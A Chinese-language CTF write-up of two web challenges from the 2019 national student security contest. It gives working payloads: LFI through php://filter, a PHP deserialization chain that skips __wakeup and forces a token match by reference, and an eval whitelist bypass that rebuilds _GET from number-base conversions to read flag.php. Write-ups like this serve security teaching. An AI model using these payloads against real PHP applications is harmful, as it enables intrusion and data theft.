简单小结

菜鸟第一次打国赛,这次题目质量很高,学到了许多姿势。

Web

Justsoso

打开题目,源代码出存在提示:



使用LFI读取index.php与hint.php

http://d4dc224926cd47bca560b0ec2f84bad155efe5b747574b89.changame.ichunqiu.com/?file=php://filter/read=convert.base64-encode/resource=index.php

http://d4dc224926cd47bca560b0ec2f84bad155efe5b747574b89.changame.ichunqiu.com/?file=php://filter/read=convert.base64-encode/resource=hint.php

得如下源码:

<html>

<?php

error_reporting(0);

$file = $_GET["file"];

$payload = $_GET["payload"];

if(!isset($file)){

	echo 'Missing parameter'.'<br>';

}

if(preg_match("/flag/",$file)){

	die('hack attacked!!!');

}

@include($file);

if(isset($payload)){

    $url = parse_url($_SERVER['REQUEST_URI']);

    parse_str($url['query'],$query);

    foreach($query as $value){

        if (preg_match("/flag/",$value)) {

    	    die('stop hacking!');

    	    exit();

        }

    }

    $payload = unserialize($payload);

}else{

   echo "Missing parameters";

}

?>

<!--Please test index.php?file=xxx.php -->

<!--Please get the source of hint.php-->

</html>

<?php

class Handle{

    private $handle;

    public function __wakeup(){

		foreach(get_object_vars($this) as $k => $v) {

            $this->$k = null;

        }

        echo "Waking up\n";

    }

	public function __construct($handle) {

        $this->handle = $handle;

    }

	public function __destruct(){

		$this->handle->getFlag();

	}

}

class Flag{

    public $file;

    public $token;

    public $token_flag;

    function __construct($file){

		$this->file = $file;

		$this->token_flag = $this->token = md5(rand(1,10000));

    }

	public function getFlag(){

		$this->token_flag = md5(rand(1,10000));

        if($this->token === $this->token_flag)

		{

			if(isset($this->file)){

				echo @highlight_file($this->file,true);

            }

        }

    }

}

?>

很容易可以知道此题考的是php反序列化,通过file引入hint.phpindex.php,操作payload反序列化执行类中的getflag()函数

此题有两个难点:

正则Flag判断绕过与随机数md5判断的绕过

前者可通过使用 /// 绕过parse_url()函数,此时该函数获取到的内容为空,而后者可以使用指针来将token_flag指向token,来使两者恒等。

添加以下代码在本地生成序列化字符串:

$a = new Flag(‘flag.php’);

$a->token_flag = &$a->token;

$b = new Handle($a);

echo urlencode(serialize($b));

输出的结果为:

O%3A6%3A%22Handle%22%3A1%3A%7Bs%3A14%3A%22%00Handle%00handle%22%3BO%3A4%3A%22Flag%22%3A3%3A%7Bs%3A4%3A%22file%22%3Bs%3A8%3A%22flag.php%22%3Bs%3A5%3A%22token%22%3Bs%3A32%3A%22bc573864331a9e42e4511de6f678aa83%22%3Bs%3A10%3A%22token_flag%22%3BR%3A4%3B%7D%7D

注意里边有不可见字符%00,且需要将Handle的对象数量改成2+,这样才可以进入__destruct函数。

故最终payload为:

///index.php?file=hint.php&payload=O:6:"Handle":2:{s:14:"%00Handle%00handle";O:4:"Flag":3:{s:4:"file";s:8:"flag.php";s:5:"token";s:32:"bc573864331a9e42e4511de6f678aa83";s:10:"token_flag";R:4;}}

love_math

打开题目,发现在js地址出使用ajax向calc.php发送数据

使用浏览器访问之,得源码

<?php

error_reporting(0);

//听说你很喜欢数学,不知道你是否爱它胜过爱flag

if(!isset($_GET['c'])){

    show_source(__FILE__);

}else{

    //例子 c=20-1

    $content = $_GET['c'];

    if (strlen($content) >= 80) {

        die("太长了不会算");

    }

    $blacklist = [' ', '\t', '\r', '\n','\'', '"', '`', '\[', '\]'];

    foreach ($blacklist as $blackitem) {

        if (preg_match('/' . $blackitem . '/m', $content)) {

            die("请不要输入奇奇怪怪的字符");

        }

    }

    //常用数学函数http://www.w3school.com.cn/php/php_ref_math.asp

    $whitelist = ['abs', 'acos', 'acosh', 'asin', 'asinh', 'atan2', 'atan', 'atanh', 'base_convert', 'bindec', 'ceil', 'cos', 'cosh', 'decbin', 'dechex', 'decoct', 'deg2rad', 'exp', 'expm1', 'floor', 'fmod', 'getrandmax', 'hexdec', 'hypot', 'is_finite', 'is_infinite', 'is_nan', 'lcg_value', 'log10', 'log1p', 'log', 'max', 'min', 'mt_getrandmax', 'mt_rand', 'mt_srand', 'octdec', 'pi', 'pow', 'rad2deg', 'rand', 'round', 'sin', 'sinh', 'sqrt', 'srand', 'tan', 'tanh'];

    preg_match_all('/[a-zA-Z_\x7f-\xff][a-zA-Z_0-9\x7f-\xff]*/', $content, $used_funcs);

    foreach ($used_funcs[0] as $func) {

        if (!in_array($func, $whitelist)) {

            die("请不要输入奇奇怪怪的函数");

        }

    }

    //帮你算出答案

    eval('echo '.$content.';');

}

可以看到过滤了一些常用字符和基于白名单的过滤,

限制得比较死,故此处我们只能使用白名单内的函数来进行命令执行,且不能有黑名单内的字符。

我们注意到,白名单里边的base_convert、dechex、decbin等用于进制转换的函数,我们可以使用其来绕过基于白名单的检测。比如:phpinfo可以将phpinfo先转换成hex,在转换成十进制,这样就可以做到无字母执行函数。

由于长度问题,我们无法直接在参数c里传过多的白名单函数+字符,所以这里我们使用其他GET参数传入,不直接使用参数c,即可绕过,但要注意的是此处的参数名,不能为字母,只能为数字,不然会被第二个关键词白名单所拦截。

再由于Ascii转成Hex后转回来需要hex2bin函数,而白名单里并没有这个函数,所以我们需要使用进制转换进行绕过,又因为hex2bin里部分字母只有在32进制后才会出现,所以此处我们选择36进制。将hex2bin36进制成无字母的10进制得到:37907361743我们使用base_convert(37907361743,10,36即可转换成hex2bin,而_GEThex5f474554,里边包含了字母f,需要在进行一次转换:f正好为16进制里的最后一个字母,可直接使用dechex(1598506324)即可绕过。故$sin=base_convert(37907361743,10,36)(dechex(1598506324))即为$sin=_GET

接着我们继续构造:

我们知道:$$sin = $_GET

那么$$sin[a]()即可自定义函数名,但主要此处参数不可为字母,且[]被过滤,故改成`$$sin{0}($$sin{1})``

所以payload构造如下:

?C=$sin=base_convert(37907361743,10,36)(dechex(1598506324));$$sin{0}($$sin{1});&0=show_source&1=flag.php

2019全国大学生信息安全大赛两道web的更多相关文章

  1. 2019年上海市大学生网络安全大赛两道misc WriteUp

    2019年全国大学生网络安全邀请赛暨第五届上海市大学生网络安全大赛 做出了两道Misc== 签到 题干 解题过程 题干提示一直注册成功,如果注册失败也许会出现flag. 下载下来是包含010edito ...

  2. 2019全国大学生信息安全竞赛部分Web writeup

    JustSoso 0x01 审查元素发现了提示,伪协议拿源码 /index.php?file=php://filter/read=convert.base64-encode/resource=inde ...

  3. 2019全国大学生信息安全与对抗技术竞赛全国线下总决赛 Writeup

    0x00 Begin 关于 ISCC 2019 北理工总决赛,这一次比赛体验感总体差不多,最后我们战队荣获全国一等奖第一名,在这里非常感谢我的团队以及我的队友. 0x01 Reverse 下载题目:e ...

  4. 第16届(2019)全国大学生信息安全与对抗技术竞赛全国线下总决赛 Writeup

    笔者<Qftm>原文发布<BitHack>:https://bithack.io/forum/469/answer/333 0x00 Begin 关于 ISCC 2019 北理 ...

  5. 2019全国大学生信息安全竞赛初赛pwn前四题writeup—栈部分

    ret to libc技巧:https://blog.csdn.net/zh_explorer/article/details/80306965 如何leak出libc地址:基地址+函数在libc中的 ...

  6. 2019全国大学生信息安全竞赛ciscn-writeup(4web)

    web1-JustSoso php伪协议获取源码 ?file=php://filter/read=convert.base64-encode/resource=index.php index.php ...

  7. 【逆向笔记】2017年全国大学生信息安全竞赛 Reverse 填数游戏

    2017年全国大学生信息安全竞赛 Reverse 填数游戏 起因是吾爱破解大手发的解题思路,觉得题挺有意思的,就找来学习学习 这是i春秋的下载链接 http://static2.ichunqiu.co ...

  8. 2019balsn两道web和2019巅峰极客一道web记录

    遇到3道有点意思的web,记录一下~ web1 题目地址:http://warmup.balsnctf.com/ 源码如下所示: <?php if (($secret = base64_deco ...

  9. 2019第十二届全国大学生信息安全实践创新赛线上赛Writeup

    本文章来自https://www.cnblogs.com/iAmSoScArEd/p/10780242.html  未经允许不得转载! 1.MISC-签到 下载附件后,看到readme.txt打开后提 ...

随机推荐

  1. Go Web 编程之 响应

    概述 上一篇文章中,我们介绍了请求的结构与处理.本文将详细介绍如何响应客户端的请求.其实在前面几篇文章中,我们已经使用过响应的功能--通过http.ResponseWriter发送字符串给客户端. 但 ...

  2. must appear in the GROUP BY clause or be used in an aggregate function

    今天在分组统计的时候pgsql报错 must appear in the GROUP BY clause or be used in an aggregate function,在mysql里面是可以 ...

  3. 金三银四,磨砺锋芒;剑指大厂,扬帆起航(2020年最全大厂WEB前端面试题精选)上

    金三银四,磨砺锋芒:剑指大厂,扬帆起航(2020年最全大厂WEB前端面试题精选)上 引言 元旦匆匆而过,2020年的春节又接踵而来,大家除了忙的提着裤子加班.年底冲冲冲外,还有着对于明年的迷茫和期待! ...

  4. 一次asp.net core3.1打造webapi开发框架的实践

    aaarticlea/png;base64,iVBORw0KGgoAAAANSUhEUgAAAigAAAAbCAYAAABWfHSvAAAH30lEQVR4nO1dy5GsMAx80RIESRAEST ...

  5. 【Linux】---Linux系统下各种常用命令总结

    在Linux系统下,“万物皆文件”,之所以强调在强调这个概念,是因为很多人已经习惯了win系统下找找点点得那种方式和思维,因此总是会觉得linux系统下很多指令既复杂又难记.其实都是一样得东西,只是w ...

  6. Python解析json字符串,json字符串用法

    json数据简介 json数据是一个轻量级的数据交换格式,采用完全独立于语言的文本格式,这些特性使json称为理想的数据交换语言,易于人阅读和编写,同时易于机器解析和生成. json中的字符集必须是U ...

  7. Python第一个请求接口

    1.普通get请求 import requests import json login_res=requests.post(url='http://joy.web.com:8090/login',da ...

  8. Web测试中定位bug的方法

    在web测试过程中,经常会遇到页面中内容或数据显示错误,甚至不显示,第一反应就是BUG,没错,确实是BUG.进一步了解这个BUG的问题出在那里,是测试人员需要掌握的,可以简单的使用浏览器自带开发者工具 ...

  9. mysql累加、累减

    累加 先上表结构: CREATE TABLE `abc` ( `jidu` ) NOT NULL AUTO_INCREMENT, `jine` ) DEFAULT NULL, PRIMARY KEY ...

  10. 玩转Django2.0---Django笔记建站基础十一(一)(音乐网站开发)

    第十一章 音乐网站开发 本章以音乐网站项目为例,介绍Django在实际项目开发中的应用,该网站共分为6个功能模块分别是:网站首页.歌曲排行榜.歌曲播放.歌曲点评.歌曲搜索和用户管理. 11.1 网站需 ...